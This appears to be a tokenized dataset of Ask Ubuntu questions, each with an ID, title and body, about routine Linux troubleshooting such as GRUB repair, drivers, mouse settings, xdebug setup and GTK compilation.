> - < version > debuild -s cd .. dput ppa : techtonik/backports < package > _ < version > _source.changes done .
395586	blocked files ( `` padlock '' -symbols )	in my usb-stick appeared `` padlock '' -symbols and i can not open the files . how do i can give again permissions-rights ? thanks . yves
395587	no boot and unable to change boot sequence	ubuntu 12.04 installation completed ; before removing installation media power failure . after that no booting and unable to enter bios also . no way to change boot sequence . please help me ...
395590	location of your private key under enigmail	i 'm using the thunderbird extension enigmail to encrypt / sign my emails . i 've moved my private key from ~./gnupg to a removable media and set a symbol link . since my private key is used to decrypt any encrypted email , i wonder if enigmail stores the private key somewhere ? if not , is it correct , without access to the removable media , i ca n't decrypt emails ?
395593	how to get the € euro sign on my keyboard ?	i am using the latest version of ubuntu 13.10 with unity , and i am wondering how i can assign the euro sign € to one of my keys . i knew how to do it on older versions of ubuntu , but i do n't know now ... . when i press shift+4 it shows the $ sign . but i would also like to get the euro sign ... maybe if i press alt+4 ?
395600	restore grub - possibility of using gparted live	i 've just installed windows 7 after installation of ubuntu 13.10 . can i use gparted live cd to restore grub ? i ask , because my internet connection is very slow and gparted live is small ( 150 mb ) .
395602	how to replace strings in file without regex ?	i need to replace some strings in files ( from command line ) but i do n't want to use sed -i because my string contains lots of funny characters which need to be correctly escaped . is there a way to turn off regex and just replace plain string ?
395606	i ca n't change the mirror in the software center	in order to change the mirror we 're using for updates , the procedure is to open the software centre , and go to edit- > software sources . there i can see the option `` download from '' and when i click it , the list of countries and servers appeared . i try to change it , but the problem is `` choose server '' button is disabled and ca n't be used . so , the only option for me was to click on `` cancel '' button or to close the window which means i gave up . what is the problem here , why i ca n't change the source for update and how to do that ?
395607	cleaning ubuntu temporary files if they exist	i need to do a lot of cleaning in my virtual machine whose operating system is ubuntu . normally in windows , there is this kind of directory that contain temporary files and that should be cleaned : c : \documents and settings\administrator\local settings\temp does it exist such a directory in ubuntu ? if yes , what is it ? thank you a lot .
395611	difference between baobab and df/du	i have ssd drive . baobab shows / uses 34.3 gb , du -h / last line is 32g / df shows $ df -h filesystem size used avail use % mounted on /dev/sda2 103g 78g 20g 80 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 789m 1.3m 787m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 440k 3.9g 1 % /run/shm none 100m 136k 100m 1 % /run/user /dev/sda1 93m 126k 93m 1 % /boot/efi 103g and 78g actually correlate with disks information : 111 gb â 26 gb free ( 76.3 % full ) why the difference between baobab/du and df is so drastical ( 40g at 110g ssd ) ? how to determine where the space goes and how much space is used actually ?
395612	fill the area below/above an x-y curve in calc	i want to draw a plot with the points : y > = f ( x ) where f ( x ) is some function i define . using an x-y plot , i can draw only the function : y = f ( x ) using an area plot , i can draw an area of a single column ( i.e . not y as a function of x ) . is there any way i can fill the area above the x-y curve ? edit : when the x values are linear ( i.e . 0 , 1 , 2 , ... ) then it is easy to fill the area below the curve by using an area plot with the y series only , like here ( right ) :
395613	restricting certain actions in a directory	so i have a web project , its a website that gives certain problems and the users try to find a solution using the c language , the compiling process is done by php , what i want to know is how can i protect my server against malicious programms that are written in c. i done some researches and i found something called chroot jails and a command in linux chroot , i read some documentation but i did n't understand it quiet well . i 'll be thankfull if anyone could help me to understand it .
395614	how to know if socket server is working	i am creating a socket server using c , but the client will be an arduino board so i would like to know if there is a way to be testing my code without the client since the arduino is yet to arrive .
395616	actual size vs virtual size	am downloading a pacman git projects which is nearly 20gb . but i have only 4gb available in actual size .whereas i have 200gb available in virtual . dynamically allocated storage . will i have any problem ? ..or must i increase the size of actual . ? ..if yes..then how ? help me
395627	all share cast or multi connection with wifi	is there any way , possibility or software to connect a laptop with ubuntu 12.04 on it ( or a newer version ) with the samsung allshare cast dongle wich is working with i guess wifi ? as background : my tablet make a connection to the dongle and send the display content the the projector . this is nice but sometimes it is better to send the content of the laptop to the projector . and of course the keybord of the laptop is better . until now i do not have found the dongle in the network i do not now the ip of the dongle i now the name of the device from the tablet but nothing else . any help ?
395630	how to sync rhythmbox playlists to device with relative path ?	i am trying to sync an external usb device with rhythmbox . in the device properties i select the playlists i want to sync and it copies music + playlists correctly to the device . however , the paths in the playlists copied to the device seem to be absolute , not relative , which renders the playlists unusable . they look like this : file : ///media/neferty/9016-4ef8/music/ ... my .is_audio_player file looks like this : name= '' clip zip 16gb ssd '' audio_folders=music/ output_formats=audio/mpeg , audio/x-ms-wma , application/ogg playlist_formats=audio/x-mpegurl , audio/mpeg-url playlist_path=playlists/ endoffile=placethisheretoensurethereisablankspacebeforethelastlineofthefile does anyone know how to make rhythmbox to save playlists with relative path ?
395631	viewing videos shows only black screen	whenever i try to watch videos i get only black screen . sound however plays fine . this happens on all videos and with all video formats . it does n't matter wheter i use totem or vlc . i 've installed ubuntu-resticted-extras . using ubuntu 12.04 . it does n't happen always . some times it works and some other time it does n't .
395632	how to view synced files and folders from remote device ?	setup i have installed ubuntu one application on two machines : 1 ) ubuntu 12.04.03 pc and 2 ) mac mini os x mavericks . on ubuntu pc , i have added and synced locally the ... /home/documents/-folder under the `` folders '' -tab in the ubuntu one application . objective i would like to view , download and edit files from the ubuntu pc 's ... /home/documents/-folder using my mac mini . problem when i open the `` folders '' -tab in the ubuntu one application on my mac mini , i do see a `` documents '' -folder , but it is not the documents folder of my ubuntu pc , but the documents folder of my mac mini added automatically by the ubuntu one application . when i open the `` devices '' -tab and and click `` go to the web page to manage your other devices '' , i can access and see the contents of the ... /home/documents/-folder of my ubuntu pc . note : my ubuntu one application has only the following tabs : `` folders '' , `` share links '' , `` settings '' and `` account information '' . that is , there is no `` cloud '' -tab . question should i be able to see my ubuntu pc 's ... /home/documents/ -folder from my mac mini under the `` folders '' -tab or is the only way to access the folder via the `` devices '' -tab and web interface ?
395634	trying to run windows version of steam in wine ... to no avail	i used to use two versions of steam , the linux version and the windows version run through wine . after re-installation on a new machine , this no longer works . wine hits a critical error and needs to close when i try to log in to my steam account on the new computer . steam installs fine , using both regular wine and playonlinux , but seems to fail al logging in . cant find any specific error codes . thank you for your time .
395635	install xdebug error	i followed these steps to install xdebug on ubuntu download latest xdebug source file unpack package , run : tar -xvzf xdebug-2.2.3 run : cd xdebug-2.2.3 run : phpize run : sudo apt-get install g++-multilib run : cflags=-m32 cppflags=-m32 ./configure run : make copy .so file to folder with extensions , run : sudo cp modules/xdebug.so /opt/lampp/lib/php/extensions/no-debug-non-zts-20090626 edit /opt/lampp/etc/php.ini and add the line just before [ data ] line , run : sudo gedit /opt/lampp/etc/php.ini zend_extension = /opt/lampp/lib/php/extensions/no-debug-non-zts-20090626/xdebug.so restart web server , run : sudo /opt/lampp/lampp restart but after restarting xampp i 'm getting error failed loading /opt/lampp/lib/php/extensions/no-debug-non-zts-20100525/xdebug.so : /opt/lampp/lib/php/extensions/no-debug-non-zts-20100525/xdebug.so : undefined symbol : zend_execute_ex i donot know what i did wrong ? php version php version -- -- -- -- -- - php 5.5.3-1ubuntu2.1 ( cli ) ( built : dec 12 2013 04:24:35 ) copyright ( c ) 1997-2013 the php group zend engine v2.5.0 , copyright ( c ) 1998-2013 zend technologies with zend opcache v7.0.3-dev , copyright ( c ) 1999-2013 , by zend technologies phpize -- -- -- configuring for : php api version : 20121113 zend module api no : 20121212 zend extension api no : 220121212
395636	problem with gnome-shell 3.10 in ubuntu 13.10	i installed gnome-shell 3.10 in ubuntu 13.10 but have several problems : i could n't decrease brightness with fn+f5 but i could increase that with fn+f6 . i could n't set alt+shift to change keyboard layout . ( my system is up to date ) installing gnome-shell 3.10 also caused a problem for unity desktop in unity desktop there is n't mouse arrow ! please help me to solve them . thanks
395640	kubuntu : disable mouse acceleration and adjust mouse speed	i would like to disable mouse acceleration . i ca n't stand it when the same physical distance results in different screen distance each time i move the mouse . also , i would like to adjust cursor speed to my liking . the problem is that kubuntu allows neither : mouse acceleration can not be set to 0 and there 's not option for mouse speed/sensitivity . so , the questions are : how do i disable mouse acceleration completely ? how do i adjust mouse speed ?
395642	running ubuntu with 6 gpus purple screen/ loading initial ramdisk	somehow i did managed to boot ubuntu with 5 gpus . with a lot of pain and much more time . i 'm having problem with the 6th one . on hdd i have windows and ubuntu ( dual boot ) . i can get in windows with 6 gpus without problems . device manager recognized them all ( 2 with exclamation marks , but this is not important ) . when i tried to boot in ubuntu with 6 gpus , first i selected it , and then wait os for loading , but it stops/freeze ( purple screen ) ( i think , i waited like 5min , nothing happened-moved ) in other boot it stops on loading initial ramdisk ... when trying with 5 gpus , works immediately . i think there 's some trick , with ubuntu or bios . specs : ubuntu 12.04.3 lts 64bit mobo : ga-990fxa-ud7 ( bios updated ) 8gb ram amd sempron 145 6x r9 290 , all on pcie riser , just one is connected to a monitor via dvi-d cable driver : catalyst 13.12 linux i would appreciate any help . thank you .
395644	how to elevate a programs privileges on the fly ?	i 'm relatively new to linux ( coming from windows ) and one thing that always bugs me is how restrictive the system is . for example i 'm trying to install sublime text 2 into /opt/ right now , but when i open the tar archive and try to extract the folder , i get the following error : you do n't have the right permissions to extract archives in the folder `` file : ///opt '' in windows or mac i usually would have some sort of option `` as administrator.. '' , which would elevate the privileges instantly ( possibly prompting a password ) and then perform the operation . with linux i seem to be stuck to somehow figure out the archive manager 's exact name and then run it with sudo from the terminal . in the menu there is n't even a right-click `` run as root.. '' option or anything similar . is n't there an easier way of handling this in general ? i 'm running xubuntu with xfce but i had this problem with every desktop distribution i tried so far .
395647	syntax error : unknown group 'crontab ' in statoverride file	i am getting an error when i try to download playonlinux ( in order to download itunes ) from both the software center and at the command line using sudo apt-get install playonlinux . preconfiguring packages ... dpkg : unrecoverable fatal error , aborting : syntax error : unknown group 'crontab ' in statoverride file e : sub-process /usr/bin/dpkg returned an error code ( 2 ) what should i do ?
395651	installing windows7 on a laptop that was on windows8 , then on ubuntu	i bought a laptop , it came with windows 8 . horrible . so i installed ubuntu . then i could n't access windows 8 anymore . so i played around and ended up deleting my windows 8 . i reinstalled the whole thing from scratch , only with ubuntu this time . now , i want to install a `` fresh '' copy of windows 7 on another partition . i created a bootable usb stick , but it wo n't load . it always goes straight to grub . i did the boot-repair . well , now , i could pick someone 's brain . thanks : ) and merry xmas and happy holidays ! !
395653	install failed using wubi under windows 8	i just ran the wubi installer under windows 8 . after reboot , i got the dual boot option . windows is still working , but ubuntu only makes the computer restart . i had no errors during the installation . any idea ? ty
395654	high power consumption due to 740m drivers ? soutions ?	i 've installed ubuntu 13.10 in my laptop , an asus s56cb , also called asus k56cb in other countries . my first problem is the power consumption . in windows 8 i get 4h30min viewing video with all switched off and 25 % brightness . in ubuntu i get 3h with all off and 5 % brightness . on normal use , surfing and other stuff , i get 3h45min in windows and a surprising 1h50min in ubuntu . i can live with the same or a bit less autonomy than windows , but this goes to the half than the microsoft so . the other problem is installing the drivers . i 've installed several drivers from different sources , from the official page of nvidia and from a couple of ppas through bumblebee and other stuff like that . the laptop now works great , and i do n't care much about the drivers of the graphic card because the hd4000 gives me simple acceleration for ccsm and unity . the question is if the high power consumption can be anormaly high due to the graphic card , because if the gpu do n't have the drivers , the so can administrate it good and wastes a lot of energy . by now , writing this and listen in spotify , the laptop consumes 21.9w . edit1 : cpufreq , as i think , works good and yes , i try tlp mode .
395656	unable to connect to server while installing ros	i am not able to connect to packages.ros.org though i am having a strong wi-fi connection in ubuntu 12.04 installed in virtual machine . i want to uninstall ros-hydro to install ros-fuerte .
395657	how do i change the bad action i selected as default on usb stick insertion ?	i inserted my smartphone in my laptop with a usb cable , and i wrongly checked the `` set this action as default '' ( or `` remember this action '' , i do n't remember the exact sentence ) after i selected a bad action ( open folder ) because it is the system partition of the smartphone . i do i revert this action so that ubuntu ask me again what to do and i can instruct him to always do nothing ? i just want to auto open the data partition . thank you very much .
395660	kalgebra load problem	i want use kalgebra on unity . but loading of this program waste more time and after approximately 10 minute it be loaded but on any operation it freeze again . cpu load is so high when it is trying to load . i typed kalgebra in terminal and have take this errors rapidly : x error : badrequest ( invalid request code or no such operation ) 1 extension : 153 ( uknown extension ) minor opcode : 19 ( unknown request ) resource id : 0x540002c x error : badrequest ( invalid request code or no such operation ) 1 extension : 153 ( uknown extension ) minor opcode : 14 ( unknown request ) resource id : 0x540002c what is the problem ?
395661	is wine a good thing to have	i was just wondering if wine really is a program that i should have ? there are many programs for linux as it is getting more popular and i am not sure how much of a liability for viruses and such wine will be on my computer . i also do n't want to install windows programs on a ubuntu computer and just have a compatibility issue and mess up my computer , so is it a more or less necessary program or am i ok to just not have it ?
395663	calc - adding series to a chart	i created an x-y chart in libreoffice calc . now i want to add series . currently what i do is : right-click the chart - > edit . right-click the chart - > data ranges . click add . manually write the ranges for the name , the x values , and the y values . is there a way to do this without so much manual labour ?
395664	objective : understanding file permissions	i want to write a shell script that takes two arguments : username ( usr ) and filename ( fname ) , then resolve and show permissions of the given user on the given file .
395665	ca n't find bluetooth file	this may sound dumb , but i have searched everywhere for /etc/bluetooth/audio.conf . i can not find it . i have tried searching and doing everything of the manner , but i can not find it . please help .
395672	problem for duplex printing with hp officejet pro 8600 plus	with the hp officejet pro 8600 plus printer , i can only duplex print the .pdf format document but i did not manage to do so for .doc , .docx nor .odt documents . does anyone know why ? thank you !
395675	grub rescue : error no such device after attempting to remove ubuntu	after trying to delete the ubuntu partition from windows , my computer can no longer boot to the windows operating system . on startup , it gives the grub rescue error . how can i set my default boot to windows ? it 's there , i just need to boot to it . not ubuntu .
395676	how to build gui application in c language using gtk+ ?	i have written code in c language using gtk . this code gives a window with 2 buttons , but i do not know how to make the standalone gui application from this code . please explain to me step by step and in detail . # include < gtk/gtk.h > void static call ( gtkwidget *widget , gpointer data ) { g_print ( `` % s \n '' , ( gchar* ) data ) ; } int main ( int agrc , char *agrv [ ] ) { gtk_init ( & agrc , & agrv ) ; gtkwidget *window , *button , *vbox ; window=gtk_window_new ( gtk_window_toplevel ) ; g_signal_connect ( window , '' delete-event '' , g_callback ( gtk_main_quit ) , null ) ; gtk_window_set_title ( gtk_window ( window ) , '' two button '' ) ; vbox=gtk_vbox_new ( 0,0 ) ; button=gtk_button_new_with_label ( `` button 1 '' ) ; g_signal_connect ( button , '' clicked '' , g_callback ( call ) , ( gpointer ) `` button 1 '' ) ; gtk_box_pack_start ( gtk_box ( vbox ) , button,0,0,0 ) ; button=gtk_button_new_with_label ( `` button 2 '' ) ; g_signal_connect ( button , '' clicked '' , g_callback ( call ) , ( gpointer ) `` button 2 '' ) ; gtk_box_pack_start ( gtk_box ( vbox ) , button,0,0,0 ) ; button=gtk_button_new_with_label ( `` close '' ) ; g_signal_connect ( button , '' clicked '' , g_callback ( call ) , ( gpointer ) `` button 2 '' ) ; gtk_box_pack_start ( gtk_box ( vbox ) , button,0,0,0 ) ; gtk_container_set_border_width ( gtk_container ( window ) ,10 ) ; gtk_container_add ( gtk_container ( window ) , vbox ) ; gtk_widget_show_all ( window ) ; gtk_main ( ) ; return ( 0 ) ; }
395677	burn ubuntu to usb flash drive for install to computer	do i have to use a disc to load ubuntu on to my pc . ca n't i partition it and install a copy ? or copy/burn to a usb drive . sorry new to this .
395679	cinnamon issues with ubuntu 13.10	i have been using cinnamon interface with ubuntu 13.04 for a while and i really liked it . recently i upgraded to 13.10 and installed the default cinnamon 1.7 available in the package manager . i was able to log in with cinnamon but each time the desktop freezes and forces me to shutdown . i then switched to default ubuntu interface and installed cinnamon 2.0 ( thinking it would be some compatibility issue ) . however , when i switch to cinnamon , i get the following message cinnamon just crashed . you are currently using fallback mode . i do n't quite understand why it occurs . i read on web that there were few issues with using cinnamon in ubuntu 13.10 , but fixed recently . i appreciate any ideas to overcome the above problem . thanks .
395680	creating a video from an audio file in ubuntu ?	i have recorded an audio file , and would like to upload it to youtube . but youtube requires me to convert it firstly to video . so how do you do that in ubuntu ? thanks !
395684	updating ubuntu for usage with steam	i can get games like counterstrike and half life 2 working but everything is in basic black and white , steam recommends i update my video driver by add a ppa repository : enter the following : deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu precise main but when i follow the instructions it says it can not find enable cd . any idea what i am doing wrong ?
395685	it 's safe use unity tweak tool ?	i am experiencing errors in ubuntu 13.10 , i enabled autohide the side panel and i have added an active left top corner , but sometimes the dash does not appear and the hotcorner does not work , i must restart to make it work , is unity meant to be used as is ? is it safe to customize ?
395686	ubuntu ( + kubuntu ) 13.10 mouse problem	i 've got the ubuntu 13.10 ( have been using gnome ) . yesterday i have installed the kubuntu desktop and since then my mouse behaviour is kinda erratic . it 's logitech m705 ( cordless with the unified receiver ) . symptoms : after plugging in the receiver ( mouse has fresh batteries ) , it takes roughly 10 minutes to for the cursor to start 'dragging ' after the real mouse movement . after few more minutes the mouse cursor stops moving altogether . the only thing to 'fix ' this temporarily is to unplug / re-plug the receiver . i have n't seen anything suspicious in the dmesg ; just messages like this : [ 1091.417160 ] logitech-djdevice 0003:046d : c52b.0048 : input , hidraw1 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:101b ] on usb-0000:00:1a.0-1.2:1 one other thing i have modified in the configuration is disabling the touchpad when typing . does anybody have any idea how to 'fix ' this problem ( without removing kde / reinstalling the system ) ?
395687	problem installing driver intel pro/wireless 3945abg	hi ! after a few days of browsing without meeting a solution , i hope on your help here . i had only win-xp-sp3 on aspire 9113 , and updated the intel 3945abg card driver from the acer site . after that , i also installed many of the available windows updates , and finally rebooted . not rebooting right after installing the driver , resulted in the impossibility to access windows beyond the desktop image . no icons , no bars , no button , no tray : just my personalized - but empty - desktop wallpaper . the error msg after this half-freeze of the desktop ( yes , 'half ' , because mouse and keyboard are available ) is about iertutil.dll either missing or damaged , i do n't remember now . with the operating keyboard i can access ctrl+alt+del and so i have `` run ... '' available , but ca n't even run explorer , it says there is an error in explorer.exe so , i installed 12.04 lts with success ( and a lot of pleasure ) , but it does n't connect wifi ( asks for the key every n seconds ) . it does connect at excellent speed through the lan cable . i already deleted and re-created a new connection to the router , with no success . ubuntu detects the wifi card , i checked copying in terminal the codes i found in the various forums . i 'm sorry i do n't understand how to insert here the code blocks copied from my terminal . sudo lshw -c network rfkill list lspci | grep -i net wifi is enabled in bios wireless networks is on , and it finds about 20/25 routers around here . finds my router once in a while as well , say 50 % of the time . i did n't try to downgrade from the wap2 key yet , i rather prefer not to . probably there is some problem with ndiswrapper , but i 'm not able to find out by myself . help ! anticipated thanx , and happy 2014.04 ! ! *i also use windows because i need autocad for the production of *.dwg drawings , and since when i started with acad 13 i did n't have the time to learn another cad program
395693	fresh workspace like in cinnamon interface	why do n't i get a fresh workspace with ubuntu ( default ) like in cinnamon environment ? is there anyway to get this behavior by tweaking appearance settings ? i 'm using ubuntu 13.10 .
395694	while installing ubuntu i changed the partion that has windows on it to swap file , many errors and windows will not load	while installing ubuntu i changed the partition that has windows on it to swap file , many errors and windows will not load . i created multiple partitons and thought i had chose the correct one to turn into a swap file and one to ntfs for mounting ubuntu but in my inexperience i created a problem i do not even know where to begin to fix .
395696	how to install memsource	i am trying to install memsource desktop , but can not install by double clicking on download . is there another way i can do this ?
395700	how to boot kubuntu 12.04 lts for a laptop without an os	i am unable to boot my laptop with a kubuntu boot disk i made . i made sure it i burnt the 64 bit version ( my laptop is 64bit ) and not the 32 bit . i am using an imac to burn the disk and my laptop is a hp g72 notebook pc and i burnt the disk with apple burning software . please help !
395704	customizing copy and paste shortcut keys	is there a way to change the predefined ctrl+c , ctrl+v shortcuts for copy and paste ? these shortcuts do n't work in the terminal , and using ctrl+shift+c and ctrl+shift+v is cumbersome . i would like to set the win key ( â+c , â+v ) as a single shortcut across all terminal and gui apps .
395705	battery ( not present ) - but it is	i am having a acer aspire 4820t . i just installed ubuntu 12.04 . all is good but the battery shows as not present even though it is . and i do n't have the power cable attached . have tried the commands in this post : '' battery not present '' on toshiba satellite l500d but i get : cat : /proc/acpi/battery/bat1/state : no such file or directory and jim @ ubuntu : /proc $ dmesg | grep battery [ 1.525162 ] acpi : battery slot [ bat1 ] ( battery present ) so it seems to know it is present , but the directory /proc/acpi/battery does n't exist : jim @ ubuntu : /proc/acpi $ ls button event wakeup how can i fix this ?
395708	kubuntu system gui radically changed after upgrade	yesterday i did a full system upgrade , and now the gui has changed in a way that makes the system very difficult to operate . on the top bar of the windows there are no longer the close , expand , minimize buttons . i am no longer able to drag individual windows around the desktop . i an unable to resize any windows . when a new window or program is opened , it always opens in the top-left corner of the desktop . moving my mouse cursor to the far top-left corner does not show all open windows like it used to . i checked all the themes , windows behaviors , hot-corners , etc . etc . that i could think of and everything is set to the way it was before the upgrade . i am at a loss . if i could figure out how to safely just downgrade to the way things were that 'd be great . any help will be greatly appreciated . i am new to these forums , and ubuntu , but have been tinkering with debian for six years now so any instructions given clearly will be followed to the letter . thank you for your time . ~ken addendum / machine info : the hardware is as follows -- asus rog-g75vw laptop ; 8gb ram ; 750gb hhd ; nvidia geforce gtx 660m ; intel i7-3630qm processor ( 8 threads @ 2.40ghz ) os -- ubuntu 13.10 'saucy ' ( x86-64 ) ; linux kernel : 3.11.0-15-generic note -- the machine originally came with windows 8 pre-installed . i absolutely hated it so after careful study installed ubuntu alongside it , which did n't last long . eventually , i completely ditched windows and just installed ubuntu . the hdd is formatted lvm ( ca n't remember why i decided to do that and now wish i had n't ) so partitioning and manipulating the existing partitions is difficult . also , the bios has both efi and secureboot . the machine will not boot to a harddrive unless both are enabled .
395710	unable to restore ubuntu after reinstalling windows 7	one day i restarted my computer and found out that ubuntu 12.04 would not load . it would come to the dot prompt with no graphics . windows 7 was loading ok though . from windows 7 , i navigated to grub folder and it was empty . next time i restarted windows , i got the blue screen reporting system failure . i tried to fix windows with no luck , so i had to reinstall windows using factory default options . after reinstalling windows i started ubuntu from the 12.04 cd ( try ubuntu ) and ran boot repair from the terminal . the process was completed successfully . i restarted the computer , but i have the option to startup with windows only . i am providing boot repair results http : //paste.ubuntu.com/6635305/as recommended hoping to find a way to restore my ubuntu . please help . thanks , felix
395712	single click on chromium browser address bar does n't `` select all ''	found the setting for firefox browser in below link but not for chromium browser . why does n't chrome or firefox auto-highlight the address bar ? please advise if you know solution . this is on ubuntu 13.10
395713	unable to change user password	i have ubuntu 12.10 and i have lost the password and the system will not allow me to delete or change the password . i 've attempted to use the advance method through the grub but all i get is an error message '' manipulation token error '' not allowing any keystroke entries . i do n't have a cd to attempt any other method .
395714	updating from 13.04 to 13.10 problem	i had an exclamation point inscribed in a triangle come up on the top right of the screen . i look around for what it could be . i ran command sudo apt-get update i got the following error multiple times w : failed to fetch cdrom : //ubuntu 13.04 raring ringtail - release amd64 ( 20130424 ) /dists/raring/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms in order to fix it i went to software updates , other software and unchecked the cdrom with ubuntu 13.04 'raing ringtail ' ( i am now running 13.10 ) i thought it was ok to uncheck it . then i ran sudo apt-get update the problem seem to have fixed it self because the red exclamation is gone . i wanted to make sure that this will not come back to bite me .
395717	installed waha-system-adjustments_all.deb this did take over several places of my system	i accidentally installed waha-system-adjustments all.deb from sourceforge , which changed my synaptic sources . i can not get rid of it am not able to update or upgrade , what should i do ? dom @ dom : ~ $ cat /proc/version linux version 3.8.0-35-generic ( buildd @ allspice ) ( gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) ) # 50-ubuntu smp tue dec 3 01:25:33 utc 2013 dom @ dom : ~ $ cat /etc/lsb-release distrib_id=wahalinux distrib_release=7.2 distrib_codename=sarab distrib_description= '' waha linux 7.2 sarab '' dom @ dom : ~ $ sudo apt-get update [ sudo ] password for dom : get:1 http : //sf.net sarab release.gpg [ 490 b ] hit http : //sf.net sarab release
395721	restarting ubuntu server 13.10 breaks nginx & ssh	i am wondering what might be causing this . any ideas would be super helpful . i have a little micropc in my room running ubuntu server 13.10 . it 's all setup , but here is what i have to do if i have to reboot it to get all my services running normally : if i try to ssh into my server from my mac like so : $ ssh -p 5000 admin @ 72.255.255.255 it gets me there fine , except that i have also turned on google authenticator , so it does not ask me for a verification code only a password . when i enter my password it denies it automatically ( even though i know it is correct ) . my nginx server is also down when trying to access it from my public ip address . to fix this , i have to plug my keyboard into my micropc and login from there . once i do this , then my ssh works with google authenticator just fine if i try it from my mac ! however , nginx is still blocked . so , i type : sudo ufw disable i disable my firewall , then i reenable it : sudo ufw enable and voila ! everything works perfectly . i can disconnect my physical keyboard from my server , ssh into perfectly with a verification code & my password , and all my nginx sites are working fine . just not sure as to why i have to go through this process . i do n't intend on rebooting my server often , but if i have to , or the power goes out , then there will be no way for me to remotely turn it back on unless i sign in physically . what i am missing ? thanks for your insights ! : )
395723	please tell me how i can create .exe files for windows . my code is in c language gtk+	i want to create a .exe file which can run on windows . i have written a simple code to generate a window with a button in gtk . i have compiled this code and it is working properly using the command gcc code.c -o code `pkg-config -- cflags -- libs gtk+-2.0` i know using mingw32 .exe files can be created and i have created a .exe file of simple hello world c code using this command i586-mingw32msvc-gcc hello.c -o hello.exe when i try to compile a c code having ' # include ' it gives error i586-mingw32msvc-gcc code.c -o code.exe `pkg-config -- cflags -- libs gtk+-2.0` please guide me step by step and in detail i am new to ubuntu
395724	using server as wifi range extender	i just moved to a bigger apartment and my router signal peaks right before the edge of it , which is were i just installed my home server , an old laptop with ubuntu server i use to store media and as a printer server . so the idea is to make the server act as a range extender as well , problem is i ca n't find any documentation on how to do it . can it be done ?
395725	hdmi not working on ubuntu 13.04	if i connect my tv with my laptop with a hdmi cable , my tv displays only the desktop even if on the laptop i see something else . what should i do ?
395728	why does `make kernelrelease` in the headers directory return kernelversion instead of kernelrelease ?	i am running ubuntu in a virtualbox host . when i try to install the guest additions , the script complains . the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . this is because in /lib/modules/3.11.0-14-generic/build , make kernelrelease produces 3.11.7 instead of the variable in kernelrelease which is 3.11.0-14-generic . the makefile has the following code : kernelrelease : @ echo `` $ ( kernelversion ) $ $ ( $ ( config_shell ) $ ( srctree ) /scripts/setlocalversion ~~ $ ( srctree ) ) '' why is n't it $ ( kernelrelease ) instead ?
395730	what does `` low-speed usb device '' mean ?	i 've got plymouth disabled so i see anything that happens at bootup . i noticed the following : - when plugging my usb mouse , it says something like `` new full-speed usb device connected '' - when plugging the gamepad i got on christmas , it 's saying `` low-speed usb device '' can you confirm that full-speed means usb 2.0 and low-speed means usb 1.1 ( i guess usb 3.0 would be super-speed , do n't have ss-usb ports ) i 'm asking because the packaging of the gamepad tells it 's usb 2.0 . note : i ca n't check on lsusb , because it tells me `` failed to enumerate ... '' and it 's not working both on ubuntu and on windows . i guess it came broken ...
395731	can ubuntu core be installed and does it run very well on the nexus 10 ?	recently i 've bought a nexus 10 tablet . i did install ubuntu touch and do not find it ready for daily use . i have reinstalled android 4.4.2 . since i do n't like android , i have in mind to install the ubuntu core and then choose the packages and drivers . i have read : http : //malideveloper.arm.com/develop-for-mali/features/graphics-and-compute-development-on-samsung-chromebook . this article says that it works for an samsung chromebook . i think that - with some modifications- that it could work on the nexus 10 because the chromebook shares the same hardware specifications with the nexus 10 . for example the same cpu and the same graphic chip set . the boot procedure is different , but booting should n't be a problem because i have already unlocked the device , after reading https : //wiki.ubuntu.com/touch/install do you think that my idea can be realized ?
395733	automatically disable mouse acceleration whenever mouse is plugged	i have a laptop and i often use a logitech g5 mouse with it . i do n't like acceleration while using the mouse . thus i have to disable the acceleration every time i plug the mouse . is there a way to automatically disable mouse acceleration , whenever i plug my mouse ?
395735	13.10 to 12.04 downgrade problem	so , i 've been having a lot of problems with 13.10 and i want to downgrade to the more stable 12.04 . trouble is , when i try to use the livecd , i get this error message : error : could n't read file . error : you need to load the kernel file press any key to continue ... _ i 'm practically a rookie to the world of linux , so would you kindly help ! ! ! ! ! ! !
395736	no proprietary drivers are in use on this system	first off i want to say that i 'm a completely noob at ubuntu . i finally got it to work and 10 minutes later my wireless connection gave away and i got this message saying : no proprietary drivers are in use on this system it is with a broadcom sta wireless driver that is said to be not activated . i tried just installing it but every time i did that it said sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log . when i type that into the terminal , it says permission denied so i have no results to post for that . i have looked at multiple answers on here , but most , if not all , require me to download some software in order to get the wireless working , but since i have no internet connection on my laptop at the moment , i ca n't download that software . so , does anyone know how to get the wireless connection to start working ? ps : my wireless hardware is on ( i never disabled it myself ) edit : i typed in the command lspci -nn | grep 0280 , and this is what 's displayed : 02:00:0 network controller [ 0280 ] : broadcom corporation bcm43225 802.11b/g/b/n [ 14e4:4357 ] ( rev 01 ) when i typed in sudo nano /var/log/jockey.log , this is what i got : 2013-12-28 04:52:14,196 debug : comparing 3.8.0-29 with 2013-12-28 04:52:14,411 debug : updating < jockey.detection.localkernelmodulesdri $ 2013-12-28 04:52:14,842 debug : reading modalias file /lib/modules/3.8.0-29-gene $ 2013-12-28 04:52:14,932 debug : reading modalias file /usr/share/jockey/modalias $ 2013-12-28 04:52:14,933 debug : reading modalias file /usr/share/jockey/modalias $ 2013-12-28 04:52:14,986 debug : loading custom handler /usr/share/jockey/handler $ 2013-12-28 04:52:14,995 warning : modinfo for module wl failed : error : modinfo : $ 2013-12-28 04:52:15,005 debug : instantiated handler subclass __builtin__.broadc $ 2013-12-28 04:52:15,005 debug : broadcom sta wireless driver availability undete $ 2013-12-28 04:52:15,005 debug : loading custom handler /usr/share/jockey/handler $ 2013-12-28 04:52:15,012 warning : modinfo for module cedarview_gfx failed : error $ 2013-12-28 04:52:15,347 debug : linux-lts-raring installed : true linux-lts-saucy installed : false linux minor version : 8 xserver abi : 13 xserver-lts-quantal : false 2013-12-28 04:52:15,347 debug : instantiated handler subclass __builtin__.cdvdri $ 2013-12-28 04:52:15,348 debug : disabling cdv driver on live system 2013-12-28 04:52:15,348 debug : intel cedarview graphics driver not avai $ 2013-12-28 